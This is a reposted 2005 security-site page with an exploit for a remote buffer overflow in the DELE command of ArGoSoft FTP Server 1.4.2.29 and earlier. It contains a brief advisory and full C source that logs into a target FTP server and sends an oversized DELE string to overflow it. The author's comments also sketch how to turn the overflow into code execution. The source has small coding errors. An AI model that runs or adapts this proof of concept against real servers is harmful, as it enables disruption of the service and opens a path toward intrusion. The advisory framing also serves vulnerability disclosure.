首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ArGoSoft FTP Server Buffer Overflow Exploit (DELE)
来源:c0d3rz_team@yahoo.com 作者:c0d3r 发布时间:2005-04-07  

ArGoSoft FTP Server Buffer Overflow Exploit (DELE)

Summary
ArGoSoft FTP Server is "a lightweight FTP Server for Microsoft Windows platforms"

ArGoSoft FTP server contains a remote buffer overflow in the DELE (delete) command, that may cause execution of arbitrary machine code. The following exploit is a proof of concept to the previously mentioned buffer overflow vulnerability in ArGoSoft FTP Server.

Credit:
The information has been provided by c0d3r.
Buffer Overflow in ArGoSoft FTP (DELE)

Details
Vulnerable Systems:
* ArGoSoft versions 1.4.2.29 and prior

Exploit:
/*
ArGoSoft Ftp Server remote overflow exploit
author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
package : ArGoSoft 1.4.2.29 and prior
advisory : packetstormsecurity.nl/0503-advisories/argosoftFTP1428.txt
company address : argosoft.com
the bug was found by a mate and reported to argosoft and they released
another version . I downloaded the patched ver at www.argosoft.com
and started to test the server . I saw that they worked with the vul
but they didnt solve the mentioned DELE overflow . he did a wise job
every long char which would be send to server it will write a nullbyte
in the middle so we cant overwrite eip or other registers normally .
The eip would be overwrite like 00410041 which seems useless . the server
wont crash but it shows that it has beed overflowed . but the program maker
doesnt think there are people who can do wiser job ! well there is a way to
get shell.I just mention it.the code below is just show that the server is vuln.
we can overwrite eip with a nullbyte without sending a null !!!
so think there is a jmp call pop push register is around 004400E1 (for example)
so we can directly jmp to anywhere we want . anyway if u want u can try .
compiled with visual c++ 6 : cl argo.c
greetz : LorD and NT of IHSTeam,Jamie of exploitdev,simorgh-ev,PiShi,redhat
sIiiS and vahid,str0k (milw0rm),roberto (zone-h),securiteam,and other friends .
Congratulate new iran irc server irc.iraneman.org #iran #ihs
and new site www.ihsteam.com
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 290 // enough for overflowing play with it for more result

int main (int argc, char *argv[]){

unsigned char *recvbuf,*user,*pass;
unsigned int rc,addr,sock ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
unsigned short port;

int i;
if(argc < 5) {
printf("\n-------- ArGoSoft Ftp remote exploit by c0d3r --------\n");
printf("-------- usage : argo.exe host port user pass --------\n");
printf("-------- eg: argo.exe 127.0.0.1 21 c0d3r secret --------\n\n");
exit(-1) ;
}
printf("\n-------- ArGoSoft Ftp remote exploit by c0d3r --------\n\n");
recvbuf = malloc(256);
memset(recvbuf,0,256);

//Creating exploit code
printf("[+] building overflow string");
memset(buffer,0,size);

buffer[0] = 'D';buffer[1] = 'E';buffer[2] = 'L';buffer[3]='E'; buffer[4]= 0x20;
for(i = 5;i != 286;i++){
buffer[i] = 'A';
}
//EO exploit code

user = malloc(256);
memset(user,0,256);

pass = malloc(256);
memset(pass,0,256);

sprintf(user,"user %s\r\n",argv[3]);
sprintf(pass,"pass %s\r\n",argv[4]);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;

if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);


printf("\n[+] attacking host %s\n" , argv[1]) ;

Sleep(1000);

printf("[+] packet size = %d byte\n" , sizeof(buffer));

rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{

Sleep(1000) ;
printf("[+] connected\n") ;
rc2=recv(sock,recvbuf,256,0);
printf("[+] sending username\n");
send(sock,user,strlen(user),0);
send(sock,'\n',1,0);
printf("[+] sending passworld\n");
Sleep(1000);
send(sock,pass,strlen(pass),0);
send(sock,'\n',1,0);
Sleep(1000);
send(sock,buffer,strlen(buffer),0);
send(sock,'\n',1,0);
printf("[+] string sent successfully check the main window for result\n");
}

else {
printf("[-] ArGo is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);

}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cyrus IMAP Server Preauthentif
·phpBB Calendar Pro catergory P
·MailEnable SMTPd DoS (Exploit)
·Linux kernel 2.4/2.6 Bluetooth
·MailEnable Enterprise/Professi
·PunBB <= v1.2.4 change_emai
·Linux Kernel AIO Local Denial
·IBM Lotus Domino Server Web Se
·Microsoft WINS Remote Heap Buf
·Microsoft Jet Database Engine
·BakBone NetVault 7.x Remote He
·Microsoft Jet Database Engine
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved